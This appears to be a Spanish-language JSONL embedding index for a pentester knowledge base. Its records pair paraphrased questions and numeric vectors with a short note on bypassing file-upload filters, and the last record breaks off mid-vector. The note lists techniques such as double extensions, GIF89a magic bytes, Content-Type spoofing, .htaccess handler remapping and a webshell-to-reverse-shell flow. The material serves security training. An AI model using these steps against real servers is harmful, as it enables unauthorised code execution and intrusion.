"tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload estΓ‘ \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "indexar": "quΓ© tΓ©cnica sirve para subir una webshell si el servidor filtra archivos?", "v": [-0.04508, -0.1028, -0.19986, -0.21478, -0.04644, -0.20837, -0.04351, -0.14997, 0.09534, -0.03222, -0.15022, -0.06124, 0.05533, -0.09917, 0.08986, -0.04257, 0.10759, -0.15216, 0.15053, 0.01403, -0.00514, 0.06765, -0.0409, -0.17171, -0.11204, -0.04719, 0.05991, 0.02014, -0.15324, -0.07477, 0.03848, 0.01196, 0.11322, 0.03309, -0.00663, 0.0533, -0.02005, 0.11029, -0.06426, 9e-05, -0.02299, 0.02053, -0.12646, 0.04048, 0.01229, -0.05808, 0.05967, -0.09991, 0.10414, 0.04716, -0.01695, -0.03352, -0.07725, 0.05442, -0.14224, 0.00158, 0.06047, -0.20976, 0.07947, -0.05329, -0.11056, 0.01574, -0.00174, -0.01635, -0.01056, -0.05214, -0.09213, -0.01165, -0.04389, -0.04555, -0.00291, -0.01251, 0.05843, -0.00928, -0.02796, 0.0505, 0.00828, -0.01434, 0.01041, -0.02716, 0.00885, 0.02254, -0.02958, 0.01485, -0.12871, -0.06321, -0.02634, -0.02123, 0.00833, -0.08894, 0.09502, 0.0464, -0.01459, -0.01906, 0.04623, -0.03391, 0.0799, -0.02695, -0.03046, -0.0287, 0.04566, -0.05111, 0.01875, 0.0995, 0.06658, 0.14035, 0.09806, -0.06154, -0.01937, -0.04203, 0.02839, 0.07664, -0.02065, -0.00677, -0.06589, -0.04293, 0.01321, -0.08814, -0.01609, 0.05239, -0.01649, 0.00896, 0.01231, -0.01238, 0.02272, -0.00337, 0.07323, 0.04428, -0.04178, -0.02234, -0.00064, 0.05949, -0.08797, 0.03596, -0.03554, -0.03724, 0.101, -0.0023, -0.07644, -0.10183, 0.026, 0.03773, -0.12503, 0.06139, 0.07551, -0.00439, 0.08745, -0.09505, -0.11372, -0.09485, 0.02525, -0.07892, -0.02096, -0.00407, -0.07145, 0.00042, 0.02527, -0.14622, -0.07929, 0.0128, 0.00817, 0.03485, 0.04677, 0.06603, -0.02194, 0.02426, -0.0461, 0.0147, 0.06244, -0.01866, 0.00973, 0.01557, -0.04663, -0.08848, 0.02418, 0.04538, -0.07651, -0.04376, 0.02593, 0.01227, 0.00716, -0.01013, 0.0087, 0.0279, -0.0764, -0.06067, -0.01619, -0.06711, -0.02658, 0.03682, -0.02102, -0.05043, -0.10095, 0.04891, 0.00633, -0.05822, -0.02592, -0.06789, 0.03067, -0.01013, 0.0037, -0.04066, -0.03503, -0.02239, -0.01317, -0.02323, -0.00792, -0.06098, 0.01645, 0.01364, -0.0671, -0.00776, 0.06006, -0.04682, 0.03224, -0.00172, 0.05873, -0.01959, 0.00525, -0.00187, 0.00642, -0.00838, 0.0008, 0.01611, 0.02977, 0.02435, -0.00012, -0.03399, 0.02255, -0.00837, -0.06342, 0.00197, -0.00296, 0.01804, 0.01078, -0.02183, 0.01253, -0.00419, -0.02263, -0.07134, -0.00515, 0.06113, 0.00928, -0.03762, -0.00485, -0.03604, -0.03768, -0.01683, -0.0149, -0.01145, -0.01653, -0.03873, -0.02527, 0.00976, 0.03393, -0.01223]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload estΓ‘ \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "indexar": "cΓ³mo puedo usar Burp Suite para evadir restricciones al cargar archivos en una web?", "v": [0.0328, -0.05703, -0.09439, -0.18656, -0.10953, -0.01264, 0.02859, -0.11208, 0.00824, -0.13488, -0.21747, -0.17379, -0.00949, 0.02733, -0.06054, -0.09358, 0.0053, -0.00218, 0.04309, 0.03207, 0.05655, 0.1059, -0.15242, -0.00105, -0.02833, 0.07372, -0.10868, 0.126, -0.16542, 0.00755, -0.11671, 0.07978, 0.1068, -0.01071, -0.09876, 0.09687, 0.03622, 0.08571, -0.0198, -0.03594, 0.06726, 0.07512, -0.06948, 0.04685, -0.03476, -0.11206, 0.1283, -0.04668, 0.00986, 0.00023, -0.13613, 0.04782, -0.05419, 0.07438, -0.06302, -0.05491, 0.0418, -0.15068, 0.01623, 0.11158, 0.01786, 0.11917, -0.00693, 0.01223, -0.063, -0.00313, -0.00357, 0.06775, -0.15671, 0.03265, -0.01434, 0.01806, 0.06698, 0.02881, 0.01108, -0.06441, -0.01748, -0.08418, 0.05622, 0.03052, 0.08664, -0.0237, -0.05063, 0.03146, -0.14834, -0.06322, 0.04563, -0.01288, 0.02169, -0.02643, 0.03007, -0.03458, 0.02894, -0.06199, 0.04283, -0.1089, 0.06078, 0.07328, 0.04333, -0.0539, 0.06682, 0.03256, 0.06046, 0.0833, -0.02864, 0.02933, -0.02197, -0.03214, 0.04505, -0.11456, -0.00401, -0.01633, -0.08357, -0.03183, -0.06711, 0.02453, -0.01346, -0.10172, -0.04703, -0.0948, -0.09856, -0.02375, 0.0138, -0.04511, 0.03372, 0.03812, -0.03461, 0.08269, -0.05743, -0.0258, -0.10148, -0.00864, -0.00743, 0.00799, -0.04795, -0.05302, 0.01962, 0.02151, -0.03056, 0.00252, 0.02745, -0.09314, -0.10084, 0.05085, 0.10337, 0.05574, 0.02528, -0.09202, -0.07278, -0.0523, 0.04181, 0.0124, -0.01148, -0.08111, -0.00595, 0.06925, -0.05605, -0.12955, 0.03619, -0.04152, -0.04218, 0.04505, -0.11173, 0.03317, 7e-05, -0.09428, -0.05936, 0.00519, -0.04258, 0.07099, 0.06147, 0.07051, -0.02484, -0.06211, 0.0617, 0.04188, -0.0336, -0.06956, 0.00777, -0.0366, 0.02072, 0.02846, -0.00851, 0.02571, -0.05073, -0.00251, 0.05618, 0.02522, 0.03538, 0.10669, -0.05413, 0.04149, -0.02032, -0.03247, -0.05732, 0.00359, -0.02529, 0.04639, 0.01902, -0.00197, -0.01053, -0.06941, -0.07029, -0.03377, 0.00223, 0.00523, -0.03958, -0.0165, 0.03251, -0.00603, -0.01966, 0.01667, 0.07755, -0.01275, -0.0333, -0.02833, 0.01161, -0.04449, -0.01594, -0.06049, 0.00373, 0.08502, 0.00546, 0.04722, 0.04805, 0.04673, 0.03586, -0.04782, 0.00259, 0.01362, -0.02203, 0.02385, 0.00626, 0.04537, 0.01611, -0.0257, -0.01484, 0.05263, -0.10144, 0.03542, 0.00075, 0.08831, 0.0081, 0.01728, -0.00555, -0.03056, -0.06807, 0.02205, -0.03544, -0.02074, 0.01572, 0.00805, -0.00646, 0.04283, 0.01374, 0.04575]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload estΓ‘ \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "indexar": "ΒΏhay un mΓ©todo de hacking para manipular subidas cuando el upload parece bloqueado?", "v": [0.23641, 0.18064, -0.15947, -0.05674, -0.08238, -0.03851, -0.13913, 0.06106, 0.03908, -0.04191, -0.01119, -0.0413, 0.06643, 0.03212, 0.01714, -0.0471, -0.00871, -0.08359, -0.00245, -0.03101, 0.0418, 0.01632, -0.02406, -0.12114, 0.0497, -0.06528, -0.056, 0.12533, -0.28082, -0.13858, -0.00754, 0.01397, -0.09643, 0.06971, -0.10431, -0.04648, 0.00757, 0.01985, 0.06486, 0.05457, -0.08819, -0.07807, -0.07092, -0.0797, -0.02278, 0.01917, -0.02539, -0.03914, 0.02696, 0.05191, 0.04022, -0.02324, -0.19156, -0.02494, 0.00884, -0.06073, 0.14531, -0.01971, -0.02154, -0.078, -0.02453, 0.05896, 0.05924, 0.02091, -0.04382, -0.06949, -0.04989, -0.04383, -0.03095, 0.07962, 0.01821, -0.017, -0.03566, 0.03204, 0.05564, 0.02919, 0.06453, -0.05406, -0.0063, 0.0147, -0.07324, -0.01612, -0.02193, 0.07945, -0.1831, -0.02762, 0.05775, -0.12917, -0.03563, -0.02152, 0.06009, 0.01742, -0.0034, -0.061, 0.00554, -0.04667, 0.05157, 0.01095, 0.03087, 0.00265, 0.0525, -0.07398, -0.01952, 0.11519, -0.04166, 0.10271, 0.05401, -0.0576, 0.01773, -0.07461, 0.01018, 0.01819, -0.00025, -0.03172, -0.1062, -0.05321, 0.01085, 0.00124, -0.0912, -0.08569, -0.06393, -0.03263, 0.00653, 0.01999, 0.04874, -0.05472, -0.02085, 0.04292, 0.00538, -0.04403, -0.06501, 0.0577, -0.00071, 0.02482, -0.03602, 0.03651, 0.00313, -0.10864, 0.00803, -0.03572, 0.05176, 0.14438, 0.02929, -0.07768, 0.04041, -0.01168, 0.00568, -0.06229, -0.11015, -0.0704, 0.04055, -0.03196, 0.00572, 0.10176, -0.00635, 0.03334, 0.00916, -0.14605, -0.03618, 0.15456, -0.00411, 0.02398, -0.0141, 0.01952, -0.11316, -0.00039, -0.01081, -0.03242, -0.00566, -0.01692, -0.03614, 0.10211, 0.01501, -0.08397, 0.0258, -0.11301, 0.02158, -0.06174, 0.00389, -0.00914, -0.03354, 0.04845, 0.06622, -0.04897, -0.06271, -0.02273, 0.03351, 0.00202, 0.04652, 0.04974, 0.00557, 0.02242, -0.09671, 0.01133, -0.0759, -0.04915, -0.02091, 0.01956, 0.05639, 0.02372, -0.02412, -0.03399, 0.02995, -0.01091, -0.03229, -0.02496, -0.01164, -0.00295, -0.02496, 0.06887, 0.04887, -0.04958, 0.03203, -0.02006, -0.04309, -0.00303, -7e-05, -0.02803, -0.09503, -0.01588, -0.01352, 0.06637, 0.0191, 0.04115, -0.04652, 0.00473, 0.03889, 0.04755, 0.01733, 0.02107, -0.04022, 0.04823, -0.02632, -0.01104, 0.01427, 0.05893, 0.06444, -0.02804, -0.10035, -0.08556, 0.01456, 0.01469, 0.02185, -0.09912, -0.04827, -0.06068, -0.04081, 0.02853, -2e-05, -0.06204, -0.02274, 0.02358, -0.00544, -0.04111, 0.03045, -0.05719]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Trucos\n```\nDoble extensiΓ³n β†’ shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes β†’ GIF89a;\nContent-Type β†’ Burp: cambiar a image/jpeg\n.htaccess β†’ reasignar el handler para que .jpg se ejecute como PHP\n```", "indexar": "que programa me ayuda a encontrar archivos con doble extensiΓ³n en Linux?", "v": [-0.03932, 0.09526, -0.08531, -0.23335, -0.08043, -0.06016, -0.1317, 0.08456, -0.13683, -0.0061, -0.05473, -0.15649, 0.00262, -0.13659, -0.02279, -0.21961, -0.02381, -0.11912, 0.07043, -0.06209, -0.05462, 0.08855, -0.15228, -0.0806, 0.01361, -0.01533, 0.00411, -0.04018, 0.06073, 0.03019, -0.07666, 0.0147, -0.05152, 0.06106, -0.02968, 0.11555, 0.08678, 0.02889, 0.08556, 0.07472, 0.11032, -0.06211, 0.00322, 0.05095, -0.10534, -0.12157, 0.07629, 0.00671, 0.07345, -0.13154, -0.02525, -0.03676, 0.00599, -0.00633, 0.10122, -0.09196, 0.03494, -0.24585, -0.07757, 0.02412, -0.08406, 0.0497, -0.01995, -0.06543, 0.06941, 0.05365, 0.00815, -0.01783, -0.15294, 0.03443, -0.05352, 0.1642, 0.01887, -0.00024, -0.12939, 0.04595, -0.06503, -0.05097, 0.04531, -0.05352, 0.05648, 0.0094, 0.05225, 0.05685, -0.0339, -0.09111, -0.03077, 0.06891, -0.02117, 0.02312, 0.10809, -0.0055, -0.03167, 0.05931, 0.07112, -0.03816, 0.11811, 0.01022, 0.02171, 0.00984, -0.01459, 0.00945, -0.05745, 0.08197, 0.00612, 0.03932, 0.06626, 0.02711, -0.10011, -0.01137, 0.08238, 0.00815, 0.10217, 0.01204, -0.13003, -0.05128, 0.01144, 0.00164, 0.02762, -0.03791, -0.02964, 0.05676, -0.06857, 0.09933, -0.02454, -0.07313, -0.06063, 0.14272, -0.05747, -0.02826, 0.0649, -0.06574, 0.04029, 0.01697, -0.04624, 0.0073, 0.03491, -0.04514, -0.02973, 0.00327, 0.03804, 0.02955, 0.0504, 0.05506, 0.06474, -0.02816, 0.01843, -0.06233, -0.00223, -0.06783, -0.09231, 0.00896, 0.07876, 0.01763, -0.0832, -0.03623, 0.00561, 0.0283, -0.04141, -0.05285, -0.04204, -0.01899, -0.05311, -0.03357, 0.00198, -0.0205, 0.01225, 0.04404, 0.00321, 0.012, -0.01325, 0.00988, 0.01277, -0.0655, -0.01671, -0.06988, 0.09109, -0.03971, 0.00715, 0.01029, -0.02581, -0.01312, 0.08658, 0.00721, -0.00162, -0.02649, 0.01018, 0.05694, -0.01337, 0.00531, -0.01511, 0.00092, -0.00359, -0.054, -0.08652, -0.00444, -0.00601, 0.01208, 0.02341, 0.00248, -0.06908, 0.00416, -0.06092, 0.02588, 0.02427, 0.04662, -0.05853, -0.03148, -0.00128, 0.02452, -0.03471, 0.00856, 0.05681, 0.00675, 0.00582, -0.00135, -0.02812, 0.09551, 0.08503, -0.03847, -0.0265, -0.00346, 0.01914, 0.04407, 0.04841, -0.08983, 0.01952, 0.02979, -0.02122, 0.00791, -0.01257, -0.04281, 0.04344, -0.00902, -0.02427, -0.03933, -0.02855, 0.01279, 0.06651, -0.00284, -0.03077, 0.06156, 0.0391, -0.01322, -0.02649, 0.01299, -0.00906, -0.00042, -0.01925, 0.03528, -0.07599, 0.0385, -0.01033, -0.02998, 0.00263, 0.06996]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Trucos\n```\nDoble extensiΓ³n β†’ shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes β†’ GIF89a;\nContent-Type β†’ Burp: cambiar a image/jpeg\n.htaccess β†’ reasignar el handler para que .jpg se ejecute como PHP\n```", "indexar": "con quΓ© puedo ejecutar archivos php ocultos dentro de una imagen jpg?", "v": [0.19348, 0.02577, 0.01721, 0.01077, -0.0057, -0.10112, -0.03179, 0.02224, 0.05197, -0.13419, -0.11194, -0.02408, -0.00295, 0.01962, -0.00937, -0.01415, 0.14623, 0.0117, 0.01742, -0.04031, -0.04692, -0.02092, -0.05703, -0.09614, -0.06521, -0.06708, -0.02035, 0.19918, -0.12543, -0.12023, -0.05149, 0.08585, 0.06745, 0.03225, -0.06026, 0.05177, 0.01505, -0.04986, -0.09452, 0.09989, -0.02974, 0.08, -0.15183, 0.16698, -0.01661, -0.03006, 0.01199, -0.04982, 0.05411, -0.07982, 0.03763, -0.02619, -0.13184, 0.02561, -0.0541, -0.11309, 0.01855, -0.11029, 0.08194, 0.05205, 0.03654, 0.12755, -0.02257, 0.03708, -0.03323, 0.06155, -0.0489, 0.05327, -0.05378, 0.0725, 0.00098, 0.09816, 0.03146, 0.01521, 0.00022, -0.04204, -0.05744, -0.10722, -0.12185, -0.02152, -0.01109, -0.00716, -0.08877, 0.0371, -0.10752, -0.09692, -0.16295, 0.09733, -0.01129, -0.0848, 0.06777, -0.01766, -0.01611, 0.04549, -0.00149, 0.03936, 0.02534, 0.00753, -0.028, 0.0057, -0.03744, -0.02969, -0.08362, 0.00606, 0.13921, 0.06291, 0.00865, -0.00747, -0.02382, -0.10071, 0.09174, -0.00209, -0.01251, 0.02813, -0.14286, -0.00375, 0.02447, -0.00999, 0.00461, -0.02516, -0.06724, -0.04105, -0.02398, 0.05352, 0.05248, -0.06804, 0.03274, 0.08972, -0.15286, 0.00328, -0.07067, 0.05056, -0.02241, -0.03495, -0.15157, 0.03527, 0.08662, -0.022, -0.04447, -0.04329, 0.0425, -0.05189, 0.00885, -0.01368, 0.04961, 0.05243, 0.03276, -0.06402, -0.02108, -0.02393, 0.07471, 0.00234, 0.1014, -0.05293, 0.0322, 0.07722, -0.00082, -0.0813, 0.02177, -0.00058, -0.06915, 0.09524, -0.0203, 0.06923, -0.0771, -0.09162, -0.06346, -0.06897, -0.01795, -0.02771, 0.03906, -0.03938, -0.08886, -0.03923, 0.05089, 0.0305, -0.01603, -0.12866, 0.07418, 0.0137, 0.02561, 0.04774, 0.06123, 0.04685, 0.03888, 0.01384, 0.04832, -0.02225, -0.0532, 0.00082, -0.00906, -0.03357, -0.01262, 0.02658, -0.01135, -0.0161, -0.01704, 0.06228, 0.01739, -0.03817, -0.00438, -0.04645, 0.00607, 0.04593, 0.02442, -0.09888, -0.02848, 0.08575, -0.05503, -0.02454, 0.04225, 0.00715, 0.10072, -0.10033, 0.01467, 0.01328, -0.01555, 0.00663, 0.01754, 0.00754, -0.00493, 0.09552, 0.11633, -0.02103, 0.03227, 0.04528, -0.04267, 0.02052, -0.02478, -0.05062, -0.03444, 0.06908, -0.09412, 0.01189, 0.05447, -0.01795, -0.07383, -0.03597, -0.00503, -0.06336, 0.03265, 0.06203, -0.02782, -0.02498, 0.0042, -0.05557, -0.04051, -0.0272, 0.04212, -0.05168, -0.03026, 0.07738, 0.03173, -0.01963, 0.01108, -0.02629]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Trucos\n```\nDoble extensiΓ³n β†’ shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes β†’ GIF89a;\nContent-Type β†’ Burp: cambiar a image/jpeg\n.htaccess β†’ reasignar el handler para que .jpg se ejecute como PHP\n```", "indexar": "cual es una alternativa libre para inspeccionar y modificar los headers de contenido en Burp Suite?", "v": [-0.10087, 0.03975, -0.06941, -0.10851, -0.04565, -0.10322, -0.00965, -0.15012, -0.08999, -0.12522, -0.08836, -0.02882, 0.02073, -0.04734, -0.01639, -0.03752, 0.02299, -0.15029, 0.06336, 0.03171, 0.08065, 0.02623, -0.06835, 0.01068, -0.11588, -0.10533, 0.01432, 0.0263, -0.0562, 0.00616, 0.01499, -0.01256, 0.04461, 0.05655, -0.06832, -0.04364, 0.02415, 0.02698, -0.06123, 0.01807, 0.05929, 0.01887, -0.08799, 0.10954, -0.06944, -0.09262, -0.05608, 0.13229, -0.01191, 0.0335, -0.01662, 0.05594, -0.08857, 0.0455, 0.02205, -0.01455, 0.13815, -0.12023, -0.00127, -0.03194, -0.0303, 0.11644, -0.01411, -0.04602, 0.00058, -0.07416, -0.05863, -0.07768, -0.00722, 0.05699, -0.06969, -0.0418, 0.09603, -0.04316, -0.05687, 0.02648, -0.05274, -0.08273, -0.02306, 0.06624, 0.00925, -0.01285, -0.10465, 0.1388, -0.06219, -0.14523, 0.06675, -0.21225, -0.08996, 0.02179, 0.15035, 0.07111, 0.03244, 0.09724, -0.06766, -0.01776, 0.11226, 0.0635, 0.02668, 0.04295, 0.12736, 0.01441, -0.11532, 0.13086, 0.01138, 0.05226, -0.03418, -0.00133, -0.00168, 0.05631, -0.05928, 0.06278, -0.01838, -0.03382, -0.07504, -0.11851, -0.04686, 0.05756, 0.06946, -0.08401, -0.09154, -0.07634, -0.01276, -0.06898, -0.00459, 0.00447, -0.02776, 0.0212, 0.0135, 0.10926, -0.04687, 0.03501, -0.08553, -0.03883, -0.12733, -0.03593, 0.01924, -0.03741, 0.03723, -0.03886, -0.04186, -0.00724, 0.05113, 0.01628, 0.07454, -0.01683, 0.03334, -0.09701, -0.0665, -0.01885, -0.06843, 0.00695, -0.00693, 0.03609, -0.07267, 0.0703, -0.07929, -0.01837, 0.02, 0.07821, -0.00789, -0.0186, -0.0272, -0.01858, 0.03935, -0.06838, -0.05805, -0.01808, -0.02001, 0.0087, -0.04629, 0.05928, 0.00935, -0.04155, 0.05781, -0.05143, -0.05159, -0.10205, -0.00502, -0.01214, 0.01223, 0.06417, -0.08582, 0.0136, -0.0756, -0.09267, 0.00186, 0.0588, 0.02802, 0.05141, -0.04671, 0.06494, -0.06477, -0.09974, -0.01463, -0.01614, -0.06287, -0.1079, 0.01224, -0.00528, -0.06634, -0.01555, -0.01868, -0.06517, -0.01333, -0.04574, -0.01524, 0.05077, -0.06103, 0.05895, -0.0115, 0.00121, 0.12337, 0.00014, -0.09488, -0.01717, 0.07254, 0.02039, -0.0101, -0.00046, 0.04534, 0.05538, 0.04489, -0.02226, -0.00548, 0.0134, 0.04322, 0.04917, -0.01973, 0.04975, -0.02712, 0.0342, 0.00051, 0.03234, 0.06713, 0.02277, 0.03565, 0.01992, -0.01647, -0.06195, 0.10633, 0.05879, -0.05287, -0.01629, 0.0086, -0.01191, -0.13862, 0.03115, -0.03185, -0.01885, -0.04933, 0.00429, 0.01406, -0.03575, 0.0421, -0.04621]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` β†’ EnumeraciΓ³n web).\n3. `?c=...` β†’ RCE β†’ lanzas Reverse shell.", "indexar": "que herramienta sirve para encontrar archivos ocultos en la carpeta uploads mediante fuzzing?", "v": [0.25626, -0.03684, -0.23944, -0.11247, 0.03146, -0.14931, -0.05358, 0.04158, -0.01062, -0.12767, -0.17421, -0.06901, -0.06016, 0.07607, 0.02995, -0.00698, 0.07758, -0.09542, -0.01683, -0.02597, -0.02079, 0.01732, -0.05014, -0.08611, -0.19601, -0.01055, 0.12043, 0.05697, -0.16234, -0.04699, 0.04585, 0.09834, 0.01825, 0.01398, -0.09262, -0.05067, -0.0393, -0.04924, -0.12702, 0.02696, 0.05027, 0.14552, -0.09178, 0.12573, -0.01138, -0.03364, -0.01576, 0.01814, -0.035, 0.11081, -0.05394, -0.15669, -0.08734, 0.00902, 0.00185, -0.19384, -0.0128, -0.13029, 0.0621, -0.0239, -0.04195, 0.00033, -0.03957, -0.00998, -0.05232, -0.0227, 0.02237, -0.04603, -0.09434, 0.08292, 0.04522, 0.07279, 0.11061, -0.06137, -0.05844, 0.02629, 0.00602, -0.0833, -0.0644, -0.05174, 0.08689, -0.01724, -0.04565, -0.0105, -0.05625, -0.10803, 0.04422, 0.01941, -0.04425, -0.05801, -0.00738, 0.08668, -0.09383, -0.02049, 0.07298, 0.02203, 0.07819, -0.08056, 0.01133, -0.02703, 0.06444, -0.0375, -0.1107, 0.0794, 0.00645, 0.05519, -0.03456, -0.03182, -0.02454, -0.04449, 0.12549, 0.06583, 0.07349, 0.04984, -0.02691, 0.00255, 0.04335, -0.07569, -0.03715, -0.03266, 0.01414, -0.01011, -0.06258, 0.05312, 0.02317, -0.07308, -0.01746, 0.04166, -0.03369, -0.00465, 0.01733, -0.00952, -0.10594, 0.04233, -0.08074, -0.01401, 0.03769, -0.05389, -0.02054, -0.06014, 0.09369, -0.00048, -0.0144, -0.06836, 0.0702, 0.00377, 0.05897, -0.03882, 0.03096, -0.0763, -0.0095, -0.04249, 0.02368, -0.04122, -0.0042, -0.0049, -0.0043, -0.07069, -0.14132, -0.03959, -0.07261, -0.03506, -0.02733, 0.0283, -0.01422, -0.04811, 0.01798, 0.02928, 0.0492, 0.01036, 0.06779, -0.03777, 0.0143, -0.03463, -0.04116, 0.01855, -0.03238, -0.09608, 0.06333, -0.04408, 0.00551, -0.00255, -0.00477, 0.04582, 0.0249, -0.06216, 0.11614, -0.0539, -0.03527, 0.01216, 0.0329, 0.00087, -0.04402, 0.02453, -0.11921, -0.02908, -0.02357, -0.05571, 0.02634, -0.04308, -0.03579, -0.01455, -0.03508, -0.03236, 0.02664, 0.0431, -0.02861, -0.02663, -0.01375, 0.00921, 0.03439, -0.02348, 0.04465, -0.05381, 0.05488, -0.0379, -0.00373, 0.01488, -0.01705, -0.02337, 0.03705, -0.00796, 0.07556, -0.05457, -0.01371, 0.01249, 0.0027, 0.02786, 0.00293, -0.04498, 0.00225, -0.00532, -0.00914, -1e-05, -0.00196, -0.06627, 0.03112, 0.00333, -0.04173, -0.00802, -0.0277, 0.06319, 0.0323, -0.02105, 0.00416, -0.0423, -0.00095, -0.02887, 0.01399, -0.06197, -0.01317, 0.05857, 0.00362, 0.00594, 0.03422, -0.02257]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` β†’ EnumeraciΓ³n web).\n3. `?c=...` β†’ RCE β†’ lanzas Reverse shell.", "indexar": "con que puedo localizar una webshell escondida usando parΓ‘metros de consulta como ?c=...?", "v": [0.17897, 0.02047, -0.26073, -0.00422, -0.00342, -0.07828, 0.00272, -0.04314, -0.04763, -0.06378, -0.11296, 0.02522, -0.08994, -0.09769, -0.01511, -0.01061, 0.0832, 0.07336, 0.01543, -0.02862, -0.00634, -0.10828, -0.14874, -0.01149, -0.1045, 0.01463, 0.0142, -0.0339, -0.08759, -0.08543, -0.04814, 0.08757, -0.04117, 0.07415, -0.09331, 0.15592, 0.01683, 0.02092, -0.05062, -0.04245, -0.02408, -0.09315, -0.09288, -0.044, 0.02983, 0.0293, -0.09565, -0.05428, -0.0495, -0.01351, -0.10714, -0.07179, -0.23595, 0.04415, 0.01598, -0.09942, 0.24425, -0.01473, 0.04777, 0.00062, -0.0122, -0.07637, 0.04031, 0.12349, -0.02402, -0.02978, 0.01392, 0.02789, -0.04813, -0.04703, 0.04491, 0.01597, -0.08681, -0.06438, 0.17629, 0.05964, 0.03804, -0.05209, 0.17209, 0.04639, -0.04791, -0.037, -0.07788, 0.00325, -0.11089, -0.02205, -0.00994, -0.03933, -0.02009, -0.02733, 0.01269, 5e-05, -0.05685, 0.05105, -0.02116, -0.0762, 0.00786, 0.05047, -0.00232, -0.04053, 0.08318, -0.01648, -0.11485, 0.11092, 0.10759, 0.0694, 0.02322, -0.07648, -0.08869, -0.00369, 0.05971, -0.03596, -0.05842, -0.08382, 0.00366, 0.02567, 0.00897, -0.07145, -0.00611, -0.08615, -0.07792, 0.06666, -0.07239, -0.00232, -0.01465, -0.00367, -0.01194, 0.06182, -0.03564, -0.00743, -0.02368, 0.02001, -0.06429, 0.05451, -0.01613, 0.0491, -0.00433, -0.02642, 0.06296, -0.02714, 0.03077, -0.03963, 0.03388, 0.02146, 0.13953, 0.02199, 0.01921, -0.05546, -0.12074, -0.04391, -0.01599, 0.02289, 0.0775, 0.08748, -0.07318, 0.05757, 0.02984, -0.05548, -0.0699, -0.01138, -0.02154, 0.07407, -0.00205, -0.02772, 0.00317, -0.03869, -0.00426, -0.02244, 0.00848, -0.01038, 0.04185, 0.02894, -0.02669, -0.05939, 0.03573, 0.02528, -0.03537, -0.02443, 0.07626, -0.08692, -0.01155, 0.02198, -0.02697, -0.02942, -0.0348, -0.02362, 0.08551, -0.09615, -0.00643, 0.01263, 0.05541, -0.00685, -0.00307, 0.04231, -0.02056, -0.02932, 0.01404, -0.00303, 0.0546, -0.05349, -0.08234, 0.04169, -0.04374, -0.03737, 0.00265, -0.00723, -0.02132, -0.01249, -0.04713, 0.00475, 0.00268, -0.04325, 0.02802, -0.07075, -0.05554, -0.0036, 0.05033, 0.05608, -0.04503, -0.01015, 0.00897, 0.08839, 0.085, -0.00787, 0.05067, 0.03047, 0.04342, 0.03079, 0.00724, 0.05604, -0.05961, 0.00891, -0.04706, -0.00299, 0.08225, 0.01574, -0.01468, 0.006, -0.04737, -0.03544, 0.03654, 0.06409, -0.04397, -0.00839, 0.02418, -0.04629, -0.06264, 0.02493, 0.00955, -0.07772, -0.03288, 0.03758, 0.04075, -0.06817, 0.07023, -0.06403]} -{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` β†’ EnumeraciΓ³n web).\n3. `?c=...` β†’ RCE β†’ lanzas Reverse shell.", "indexar": "necesito enumerar la ruta /uploads para detectar una vulnerabilidad que permita lanzar un reverse shell.", "v": [0.14129, -0.04953, -0.31498, -0.14988, 0.06156, 0.05054, -0.1214, 0.02854, -0.04098, -0.0578, -0.09627, -0.07662, 0.00632, -0.05137, 0.11603, 0.07739, -0.18305, 0.05485, 0.02346, -0.08771, -0.05118, -0.11284, 0.01276, -0.04182, -0.056, 0.05082, 0.01365, -0.03909, 0.04605, -0.09942, -0.12578, -0.052, 0.08034, -0.03434, -0.03404, 0.07557, -0.03691, -0.06965, 0.04238, 0.08216, 0.12186, 0.138, -0.10673, 0.07328, 0.07643, -0.05099, -0.07212, -0.15204, -0.0012, -0.00889, -0.03012, -0.01025, -0.21106, -0.03556, 0.06263, -0.02718, 0.12472, -0.05158, 0.06336, -0.07875, -0.06514, 0.0716, 0.0734, 0.03862, 0.04735, -0.03629, -0.10073, -0.10848, -0.1449, -0.0371, 0.03354, 0.02333, 0.05586, 0.10599, -0.07015, -0.03253, 0.03966, 0.05653, 0.06691, 0.01034, 0.01056, -0.02002, 0.04403, 0.05398, -0.05407, -0.06117, 0.15585, 0.0829, 0.08885, -0.00946, 0.00843, 0.01836, -0.0737, -0.00608, 0.0099, -0.043, 